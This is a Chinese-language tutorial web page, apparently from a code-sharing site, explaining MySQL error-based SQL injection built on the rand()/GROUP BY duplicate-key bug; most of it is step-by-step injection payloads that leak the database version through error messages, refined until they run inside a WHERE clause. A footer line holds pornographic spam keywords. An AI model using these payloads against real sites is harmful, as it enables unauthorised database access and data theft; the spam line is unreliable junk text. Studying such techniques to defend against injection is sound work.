網(wǎng)站MYSQL數(shù)據(jù)庫(kù)高級(jí)爆錯(cuò)注入原分析

發(fā)布時(shí)間：2016-08-24 19:12:36 作者：佚名

國(guó)內(nèi)只有一大堆高級(jí)爆錯(cuò)的利用代碼沒(méi)人分析原因這個(gè)是去官網(wǎng)查資料后分析給出的,需要的朋友可以參考下

這里主要用了mysql的一個(gè)BUG ：http://bugs.mysql.com/bug.php?id=8652
grouping on certain parts of the result from rand, causes a duplicate key error.

重現(xiàn)過(guò)程:

SQL Code復(fù)制內(nèi)容到剪貼板

use mysql;
create table r1 (a int); insert into r1 values (1),(2),(1),(2),(1),(2),(1),(2),(1),(2),(1),(2),(1),(2);
select left(rand(),3),a from r1 group by 1;
select left(rand(),3),a, count(*) from r1 group by 1;
select round(rand(1),1) ,a, count(*) from r1 group by 1;

于是便可以這樣拿來(lái)爆錯(cuò)注入了。

復(fù)制代碼

代碼如下:

select count(*),concat((select version()),left(rand(),3))x from inform<span style="line-height:1.5;">ation_schema.tables group by x;</span>

嘗試拿來(lái)實(shí)戰(zhàn)

復(fù)制代碼

代碼如下:

select * from user where user='root' and (select count(*),concat((select version()),left(rand(),3))x from information_schema.tables group by x);

提示錯(cuò)誤選擇的列應(yīng)該為一個(gè)。那么。我們換一下

復(fù)制代碼

代碼如下:

select * from user where user='root' and (select 1 from (select count(*),concat((select version()),left(rand(),3))x from information_schema.tables group by x));<span style="font-family:'sans serif', tahoma, verdana, helvetica;font-size:12px;line-height:1.5;"></span>

復(fù)制代碼

代碼如下:

1248 (42000): Every derived table must have its own alias

提示多表查詢(xún)要有別名那好辦

復(fù)制代碼

代碼如下:

select * from user where user='root' and (select 1 from (select count(*),concat((select version()),left(rand(),3))x from information_schema.tables group by x)a);

或者

復(fù)制代碼

代碼如下:

select * from user where user='root' and (select 1 from (select count(*),concat((select version()),left(rand(),3))x from information_schema.tables group by x) as lusiyu);

成功爆粗注入了.

作者：小殘繩命不息 |折騰不止

Tag：爆錯(cuò)注入

相關(guān)文章

thinkphp代碼執(zhí)行g(shù)etshell的漏洞解決
本文來(lái)介紹一下thinkphp官方修復(fù)的一個(gè)getshell漏洞，框架對(duì)控制器沒(méi)有進(jìn)行足夠的檢測(cè)導(dǎo)致的一處getshell，小編覺(jué)得挺不錯(cuò)的，現(xiàn)在分享給大家，也給大家做個(gè)參考。一起跟隨
2018-12-12
記 FineUI 官方論壇discuz所遭受的一次真實(shí)網(wǎng)絡(luò)攻擊
這篇文章主要介紹了記 FineUI 官方論壇discuz所遭受的一次真實(shí)網(wǎng)絡(luò)攻擊,需要的朋友可以參考下
2018-11-30
Linux 下多種編程語(yǔ)言的反彈 shell 方法
這篇文章主要介紹了Linux 下多種反彈 shell 方法,需要的朋友可以參考下
2017-09-06
前端安全之XSS攻擊
這篇文章主要為大家介紹了基于反射的XSS攻擊，主要依靠站點(diǎn)服務(wù)端返回腳本，在客戶(hù)端觸發(fā)執(zhí)行從而發(fā)起Web攻擊,需要的朋友可以參考下
2017-05-20
SQL注入黑客防線網(wǎng)站實(shí)例分析
這篇文章主要介紹了SQL注入黑客防線網(wǎng)站實(shí)例分析,需要的朋友可以參考下
2017-05-19
ASP+PHP 標(biāo)準(zhǔn)sql注入語(yǔ)句（完整版）
這里為大家分享一下sql注入的一些語(yǔ)句，很多情況下由于程序員的安全意識(shí)薄弱或基本功不足就容易導(dǎo)致sql注入安全問(wèn)題，建議大家多看一下網(wǎng)上的安全文章，最好的防范就是先學(xué)
2017-05-19
一句話木馬后門(mén)在防注入中的重生
對(duì)于目前流行的sql注入,程序員在編寫(xiě)程序時(shí),都普遍的加入防注入程序,有些防注入程序只要在我們提交一些非法的參數(shù)后,就會(huì)自動(dòng)的記錄下你的IP地址,提交的非法參數(shù)和動(dòng)作等,
2017-04-29
XSS繞過(guò)技術(shù) XSS插入繞過(guò)一些方式總結(jié)
我們友情進(jìn)行XSS檢查，偶然跳出個(gè)小彈窗，其中我們總結(jié)了一些平時(shí)可能用到的XSS插入方式，方便我們以后進(jìn)行快速檢查，也提供了一定的思路，其中XSS有反射、存儲(chǔ)、DOM這三類(lèi)
2016-12-27
Python 爬蟲(chóng)使用動(dòng)態(tài)切換ip防止封殺
這篇文章主要介紹了Python 爬蟲(chóng)使用動(dòng)態(tài)切換ip防止封殺的相關(guān)資料,需要的朋友可以參考下
2016-10-08
使用爬蟲(chóng)采集網(wǎng)站時(shí)，解決被封IP的幾種方法
這篇文章主要介紹了使用爬蟲(chóng)采集網(wǎng)站時(shí)，解決被封IP的幾種方法的相關(guān)資料,需要的朋友可以參考下
2016-10-08

欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

網(wǎng)站MYSQL數(shù)據(jù)庫(kù)高級(jí)爆錯(cuò)注入原分析

相關(guān)文章

最新評(píng)論

文章分類(lèi)

大家感興趣的內(nèi)容

最近更新的內(nèi)容